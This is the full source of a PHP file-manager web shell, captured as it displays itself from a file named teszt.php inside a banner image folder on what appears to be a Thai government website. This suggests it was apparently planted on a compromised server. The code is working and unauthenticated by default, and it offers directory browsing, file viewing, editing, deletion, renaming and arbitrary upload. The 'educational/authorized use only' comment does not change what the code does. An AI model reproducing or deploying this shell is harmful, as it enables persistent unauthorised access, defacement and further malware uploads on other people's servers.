Web Shell
Current directory: /home/coloflew/domains/tessabalpatiu.go.th/public_html/image_data/banner
Viewing: /home/coloflew/domains/tessabalpatiu.go.th/public_html/image_data/banner/teszt.php
<?php
// Simple PHP Web Shell with UI
// For educational/authorized use only
// Opsional: set password untuk autentikasi (kosongkan jika tidak perlu)
$auth_password = ''; // Ganti dengan password jika ingin
if ($auth_password !== '' && (!isset($_POST['auth_pass']) || $_POST['auth_pass'] !== $auth_password)) {
if (isset($_POST['auth_pass'])) {
echo 'Wrong password.';
}
?>
<form method="post">
<input type="password" name="auth_pass" placeholder="Password" />
<input type="submit" value="Login" />
</form>
<?php
exit;
}
// Direktori saat ini
$base_dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd();
$base_dir = realpath($base_dir);
if (!$base_dir || !is_dir($base_dir)) {
$base_dir = getcwd();
}
chdir($base_dir);
// Handle aksi
$action = isset($_GET['action']) ? $_GET['action'] : '';
$file = isset($_GET['file']) ? $_GET['file'] : '';
$new_name = isset($_POST['new_name']) ? $_POST['new_name'] : '';
if ($action == 'delete' && $file) {
$path = realpath($file);
if ($path && strpos($path, $base_dir) === 0 && is_file($path)) {
unlink($path);
header("Location: ?dir=" . urlencode($base_dir));
exit;
} else {
$error = "Cannot delete: invalid file.";
}
} elseif ($action == 'rename' && $file && $new_name) {
$path = realpath($file);
if ($path && strpos($path, $base_dir) === 0 && is_file($path)) {
$new_path = dirname($path) . '/' . $new_name;
rename($path, $new_path);
header("Location: ?dir=" . urlencode($base_dir));
exit;
} else {
$error = "Cannot rename: invalid file.";
}
} elseif ($action == 'edit' && $file && isset($_POST['content'])) {
$path = realpath($file);
if ($path && strpos($path, $base_dir) === 0 && is_file($path)) {
file_put_contents($path, $_POST['content']);
header("Location: ?dir=" . urlencode($base_dir));
exit;
} else {
$error = "Cannot edit: invalid file.";
}
} elseif ($action == 'upload' && isset($_FILES['upload_file'])) {
$target = $base_dir . '/' . basename($_FILES['upload_file']['name']);
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) {
header("Location: ?dir=" . urlencode($base_dir));
exit;
} else {
$error = "Upload failed.";
}
}
// Tampilan UI
?>
<!DOCTYPE html>
<html>
<head>
<title>Web Shell</title>
<style>
body { font-family: monospace; margin: 20px; background: #f4f4f4; }
.container { max-width: 1200px; margin: auto; background: white; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
h1 { margin-top: 0; }
.path { background: #eee; padding: 10px; border-radius: 4px; margin-bottom: 20px; word-break: break-all; }
table { width: 100%; border-collapse: collapse; }
th, td { text-align: left; padding: 8px; border-bottom: 1px solid #ddd; }
th { background: #f2f2f2; }
.actions a { margin-right: 5px; text-decoration: none; }
.upload-form { margin: 20px 0; padding: 10px; background: #f9f9f9; border: 1px solid #ddd; border-radius: 4px; }
.upload-form input[type=file] { margin-right: 10px; }
.error { color: red; margin-bottom: 10px; }
.success { color: green; margin-bottom: 10px; }
.edit-form textarea { width: 100%; height: 400px; font-family: monospace; margin-bottom: 10px; }
.edit-form input[type=submit] { padding: 8px 16px; }
</style>
</head>
<body>
<div class="container">
<h1>Web Shell</h1>
<?php if (isset($error)): ?>
<div class="error"><?php echo htmlspecialchars($error); ?></div>
<?php endif; ?>
<div class="path">Current directory: <?php echo htmlspecialchars($base_dir); ?></div>
<?php if ($action == 'edit' && $file):
$path = realpath($file);
if ($path && strpos($path, $base_dir) === 0 && is_file($path)):
$content = file_get_contents($path);
?>
<div class="edit-form">
<h2>Editing: <?php echo htmlspecialchars($file); ?></h2>
<form method="post">
<textarea name="content"><?php echo htmlspecialchars($content); ?></textarea><br>
<input type="submit" value="Save">
<a href="?dir=<?php echo urlencode($base_dir); ?>">Cancel</a>
</form>
</div>
<?php else: ?>
<div class="error">File not found or invalid.</div>
<a href="?dir=<?php echo urlencode($base_dir); ?>">Back</a>
<?php endif; ?>
<?php elseif ($action == 'view' && $file):
$path = realpath($file);
if ($path && strpos($path, $base_dir) === 0 && is_file($path)):
?>
<h2>Viewing: <?php echo htmlspecialchars($file); ?></h2>
<pre><?php echo htmlspecialchars(file_get_contents($path)); ?></pre>
<a href="?dir=<?php echo urlencode($base_dir); ?>">Back</a>
<?php else: ?>
<div class="error">File not found or invalid.</div>
<a href="?dir=<?php echo urlencode($base_dir); ?>">Back</a>
<?php endif; ?>
<?php else: ?>
<div class="upload-form">
<form method="post" enctype="multipart/form-data" action="?action=upload&dir=<?php echo urlencode($base_dir); ?>">
<input type="file" name="upload_file">
<input type="submit" value="Upload">
</form>
</div>
<table>
<thead>
<tr><th>Name</th><th>Size</th><th>Actions</th></tr>
</thead>
<tbody>
<?php
$files = scandir($base_dir);
foreach ($files as $item):
if ($item == '.' || $item == '..') continue;
$full_path = $base_dir . '/' . $item;
$is_dir = is_dir($full_path);
$size = $is_dir ? '-' : filesize($full_path);
$link = $is_dir ? '?dir=' . urlencode($full_path) : '?action=view&file=' . urlencode($full_path) . '&dir=' . urlencode($base_dir);
?>
<tr>
<td><a href="<?php echo $link; ?>"><?php echo htmlspecialchars($item); ?></a></td>
<td><?php echo $size; ?></td>
<td class="actions">
<?php if (!$is_dir): ?>
<a href="?action=edit&file=<?php echo urlencode($full_path); ?>&dir=<?php echo urlencode($base_dir); ?>">Edit</a>
<a href="?action=delete&file=<?php echo urlencode($full_path); ?>&dir=<?php echo urlencode($base_dir); ?>" onclick="return confirm('Delete this file?')">Delete</a>
<form style="display:inline;" method="post" action="?action=rename&file=<?php echo urlencode($full_path); ?>&dir=<?php echo urlencode($base_dir); ?>">
<input type="text" name="new_name" placeholder="New name" style="width:100px;">
<input type="submit" value="Rename">
</form>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php endif; ?>
</div>
</body>
</html>
Back